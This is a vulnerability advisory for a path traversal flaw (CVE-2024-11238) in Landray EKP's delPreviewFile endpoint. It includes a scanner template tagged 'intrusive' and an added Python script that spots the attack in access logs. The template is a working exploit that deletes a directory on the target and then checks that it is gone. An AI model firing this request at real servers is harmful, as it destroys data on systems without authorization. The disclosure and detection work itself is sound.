A vulnerability, which was classified as critical, was found in Landray EKP up to 16.0. This affects the function delPreviewFile of the file /sys/ui/sys_ui_component/sysUiComponent.do?method=delPreviewFile. The manipulation of the argument directoryPath leads to path traversal. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
PoC code [public]
id: CVE-2024-11238
info:
  name: Landray EKP - Path Traversal
  author: theamanrawat
  severity: medium
  description: |
    A vulnerability, which was classified as critical, was found in Landray EKP up to 16.0. This affects the function delPreviewFile of the file /sys/ui/sys_ui_component/sysUiComponent.do?method=delPreviewFile. The manipulation of the argument directoryPath leads to path traversal. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
  impact: |
    Remote attackers can access arbitrary files on the server, potentially leading to information disclosure or system compromise.
  remediation: |
    Update to the latest version that addresses this vulnerability or apply appropriate patches.
  reference:
    - https://github.com/CoinIsMoney/TempGuide/blob/main/LL-exp-02.pdf
    - https://nvd.nist.gov/vuln/detail/CVE-2024-11238
    - https://vuldb.com/?ctiid.284673
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L
    cvss-score: 6.5
    cve-id: CVE-2024-11238
    cwe-id: CWE-22
    epss-score: 0.24789
    epss-percentile: 0.95806
    cpe: cpe:2.3:a:landray:landray_ekp:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    vendor: landray
    product: landray_ekp
    shodan-query: http.favicon.hash:831854882
  tags: cve,cve2024,lfi,intrusive,vkev
flow: http(1) && http(2) && http(3) && http(4)
http:
  - raw:
      - |
        GET /login.jsp HTTP/1.1
        Host: {{Hostname}}
    matchers:
      - type: dsl
        dsl:
          - status_code == 200
        internal: true
    extractors:
      - type: regex
        part: body
        name: faviconPath
        internal: true
        group: 1
        regex:
          - 'href="/resource/(.*?)/favicon.ico"'
  - raw:
      - |
        GET /resource/{{faviconPath}}/favicon.ico HTTP/1.1
        Host: {{Hostname}}
    matchers:
      - type: dsl
        dsl:
          - status_code == 200
        internal: true
  - raw:
      - |
        GET /sys/ui/sys_ui_component/sysUiComponent.do?method=delPreviewFile&directoryPath=../{{faviconPath}}/ HTTP/1.1
        Host: {{Hostname}}
    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - content_length == 0
        condition: and
        internal: true
  - raw:
      - |
        GET /resource/{{faviconPath}}/favicon.ico HTTP/1.1
        Host: {{Hostname}}
    matchers:
      - type: dsl
        dsl:
          - status_code == 404
# digest: 4b0a00483046022100f3416bc63f4f18762b62a994e90775131debe63311baea81c409240131e08f26022100ff7db2b42dac30820da786c73f563c403e2ea9bd9d2564fa17a70ff8874bd753:922c64590222798bb761d5b6d8e72950
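
A defender-side check for the request pattern described above, as an added example that is not part of the original page or template: it scans web access logs for calls to delPreviewFile whose directoryPath contains a `..` segment after repeated percent-decoding. The combined log format, the sample log lines and all function names are assumptions; only the endpoint, method and parameter names come from the advisory.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Endpoint, method and parameter names come from the advisory (compared lowercased).
ENDPOINT = "/sys/ui/sys_ui_component/sysuicomponent.do"
# Assumed combined access-log layout: ip ... "VERB target HTTP/x" status size
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<verb>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) ')

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so %252e%252e is also seen as '..'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def has_traversal(path_value):
    """True if any path segment (split on / or \\) is exactly '..'."""
    return ".." in re.split(r"[\\/]+", fully_decode(path_value))

def find_suspicious(lines):
    """Return (client_ip, status, decoded directoryPath) for flagged requests."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if url.path.split(";")[0].lower() != ENDPOINT:
            continue
        params = {k.lower(): v for k, v in
                  parse_qs(url.query, keep_blank_values=True).items()}
        if "delpreviewfile" not in [v.lower() for v in params.get("method", [])]:
            continue
        for value in params.get("directorypath", []):
            if has_traversal(value):
                hits.append((m["ip"], int(m["status"]), fully_decode(value)))
    return hits

BASE = "/sys/ui/sys_ui_component/sysUiComponent.do?method=delPreviewFile&directoryPath="
SAMPLE_LOG = [  # constructed log lines, documentation IP ranges, placeholder paths
    '198.51.100.7 - - [01/Jan/2025:10:00:00 +0000] "GET /login.jsp HTTP/1.1" 200 5120',
    f'198.51.100.7 - - [01/Jan/2025:10:00:02 +0000] "GET {BASE}../example-dir/ HTTP/1.1" 200 0',
    f'203.0.113.9 - - [01/Jan/2025:10:05:00 +0000] "GET {BASE}%252e%252e%5Cexample-dir HTTP/1.1" 200 0',
    f'192.0.2.10 - - [01/Jan/2025:10:06:00 +0000] "GET {BASE}preview/tmp123 HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_LOG):
        print(hit)
```

Only parameters carried in the request line are visible to this check; a request that sends directoryPath in a POST body needs body logging or a WAF rule instead.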